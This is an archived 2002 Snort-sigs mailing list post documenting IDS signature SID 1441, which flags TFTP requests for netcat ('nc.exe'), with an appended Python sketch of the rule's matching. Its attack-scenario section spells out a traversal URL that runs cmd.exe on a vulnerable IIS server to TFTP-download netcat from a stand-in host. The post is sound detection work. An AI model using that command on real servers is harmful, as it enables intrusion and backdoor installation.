[Snort-sigs] SID 1441

warchild at ...288...
Sun Apr 28 15:28:03 EDT 2002


pcap attached
--
Rule:
alert udp any any -> any 69 (msg:"TFTP GET nc.exe"; content: "|0001|";
offset:0; depth:2; content:"nc.exe"; nocase;
classtype:successful-admin; sid:1441; rev:1;) 

--
Sid:
1441

--
Summary:
Someone attempted to get a file named 'nc.exe' via tftp.

--
Impact:
This generally means that your Windows system has been compromised
(via any number of avenues) and the attacker is making an easy
backdoor for him/herself to walk back through.  Although using netcat
does not require any special privileges, such activity should always
be considered potentially hostile.

--
Detailed Information:
Someone tried to retrieve a netcat executable via tftp.  Netcat is the
Swiss Army knife of must-have networking tools and is extremely useful
for creating backdoors, among other things.

--
Attack Scenarios:
After compromising your system or gaining some sort of access, an
attacker may prefer to make a backdoor so that future access is
easier.  Netcat (commonly distributed as 'nc.exe') is a popular method
of doing this.  Since tftp can be executed in 'one shot, one kill'
mode, it is possible for an attacker to compromise your system and
tftp in a copy of netcat in one step.  i.e.,

lynx
'http://www.vulnerable.org/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+tftp%20foobar.org%20get%20nc.exe'


--
Ease of Attack:
Trivial.  tftp is available on nearly all *nix and Windows machines
and is extremely easy to use.  Acquisition and proper use of netcat is 
another thing.

--
False Positives:
Highly unlikely.

--
False Negatives:
None.

--
Corrective Action:
Determine whether someone was tftp'ing to or from your system.
Chances are extremely good that the attacker was tftp'ing from your
system to a remote one in an attempt to get the netcat executable.
Determine if netcat is listening on a port and act accordingly.  Patch
the hole that they walked through.

--
Contributors:
warchild at ...288...

--
Additional References:
http://www.atstake.com/research/tools/nc110.txt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: tftp-nc.exe.tcpdump
Type: application/octet-stream
Size: 100 bytes
Desc: not available
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20020428/9da054fb/attachment.obj>
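As an added illustration (not part of the original post or the Snort project), the following Python mirrors what SID 1441 actually tests on a UDP datagram to port 69: the two-byte TFTP opcode |00 01| (a read request, RFC 1350) at offset 0, then the string "nc.exe" anywhere in the payload, case-insensitively. The datagrams, hosts and the scan_datagrams helper are constructed for the example; the third case shows that the rule keys on the requested filename, so a WRQ or a renamed copy does not fire it.

```python
import struct

# TFTP opcodes from RFC 1350; SID 1441 only cares about RRQ (read request).
RRQ = 1
WRQ = 2


def parse_tftp_request(payload: bytes):
    """Parse a TFTP RRQ/WRQ: opcode, NUL-terminated filename, NUL-terminated mode.
    Returns (opcode, filename, mode) or None if the datagram is not a request."""
    if len(payload) < 4:
        return None
    opcode = struct.unpack("!H", payload[:2])[0]
    if opcode not in (RRQ, WRQ):
        return None
    fields = payload[2:].split(b"\x00")
    if len(fields) < 3:  # filename, mode, and the empty piece after the final NUL
        return None
    filename = fields[0].decode("ascii", errors="replace")
    mode = fields[1].decode("ascii", errors="replace")
    return opcode, filename, mode


def sid_1441_matches(payload: bytes) -> bool:
    """Same test as the rule: content:"|0001|" offset:0 depth:2, then
    content:"nc.exe" nocase with no offset, i.e. anywhere in the payload."""
    return payload[:2] == b"\x00\x01" and b"nc.exe" in payload.lower()


def scan_datagrams(datagrams):
    """datagrams: iterable of (src, dst, dport, payload) tuples (constructed here,
    not a pcap reader). Returns one alert line per datagram that would trip SID 1441."""
    alerts = []
    for src, dst, dport, payload in datagrams:
        if dport != 69:  # the rule is 'alert udp any any -> any 69'
            continue
        if sid_1441_matches(payload):
            req = parse_tftp_request(payload)
            fname = req[1] if req else "?"
            alerts.append(f"[1:1441:1] TFTP GET nc.exe {src} -> {dst}:69 file={fname}")
    return alerts


# Constructed sample traffic: a compromised host pulling nc.exe from an attacker's
# TFTP server, a WRQ (upload) of the same name, and a read of a renamed binary.
SAMPLE = [
    ("10.0.0.5", "192.0.2.10", 69, b"\x00\x01nc.exe\x00octet\x00"),
    ("10.0.0.5", "192.0.2.10", 69, b"\x00\x02nc.exe\x00octet\x00"),
    ("10.0.0.5", "192.0.2.10", 69, b"\x00\x01update.exe\x00octet\x00"),
    ("10.0.0.5", "192.0.2.10", 69, b"\x00\x01NC.EXE\x00OCTET\x00"),
]

if __name__ == "__main__":
    for line in scan_datagrams(SAMPLE):
        print(line)
```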

